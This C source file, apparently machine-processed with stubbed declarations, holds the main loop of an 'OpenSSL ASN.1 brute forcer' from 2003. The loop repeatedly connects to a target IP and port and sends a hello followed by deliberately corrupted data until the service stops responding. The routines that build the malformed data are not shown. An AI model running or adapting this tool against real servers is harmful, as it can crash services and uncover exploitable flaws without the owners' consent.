
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct timeval {int tv_sec; int tv_usec; } ;
struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
typedef int addr ;


 int AF_INET ;
 int EXIT_FAILURE ;
 int EXIT_SUCCESS ;
 int SIGPIPE ;
 int SIG_IGN ;
 int SOCK_STREAM ;
 int atoi (char*) ;
 int buf ;
 int close (int) ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int corruptor (int ,int) ;
 int diffit () ;
 int errno ;
 int exit (int) ;
 int fflush (int ) ;
 int fprintf (int ,char*,...) ;
 int getpid () ;
 int gettimeofday (struct timeval*,int *) ;
 int htons (int) ;
 int inet_addr (char*) ;
 int memset (struct sockaddr_in*,int ,int) ;
 int printf (char*,...) ;
 int send_crap () ;
 int send_hello () ;
 int signal (int ,int ) ;
 int socket (int ,int ,int ) ;
 int srand (unsigned int) ;
 int stderr ;
 int stdout ;
 char* strerror (int ) ;
 int usleep (int) ;
 int write (int,int ,int) ;

int main(int argc, char *argv[])
{
 struct sockaddr_in addr;
 int s, port = 0, first = 1, len;
 char *host = ((void*)0);
 unsigned int seed;
 struct timeval tv;

 printf("OpenSSL ASN.1 brute forcer (Syzop/2003)\n\n");

 if (argc != 3) {
  fprintf(stderr, "Use: %s [ip] [port]\n", argv[0]);
  exit(1);
 }

 host = argv[1];
 port = atoi(argv[2]);
 if ((port < 1) || (port > 65535)) {
  fprintf(stderr, "Port out of range (%d)\n", port);
  exit(1);
 }

 gettimeofday(&tv, ((void*)0));
 seed = (getpid() ^ tv.tv_sec) + (tv.tv_usec * 1000);

 printf("seed = %u\n", seed);
 srand(seed);

 memset(&addr, 0, sizeof(addr));


 signal(SIGPIPE, SIG_IGN);

while(1)
{

 if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
  fprintf(stderr, "Socket error: %s\n", strerror(errno));
  exit(EXIT_FAILURE);
 }
 addr.sin_family = AF_INET;
 addr.sin_port = htons(port);
 addr.sin_addr.s_addr = inet_addr(host);
 if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
  fprintf(stderr, "Unable to connect: %s\n", strerror(errno));
  if (!first)
   diffit();
  exit(EXIT_FAILURE);
 }
 first = 0;
 printf("."); fflush(stdout);

 len = send_hello();
 write(s, buf, len);
 len = send_crap();
 corruptor(buf, len);
 write(s, buf, len);
 usleep(1000);
 close(s);
}

 exit(EXIT_SUCCESS);
}
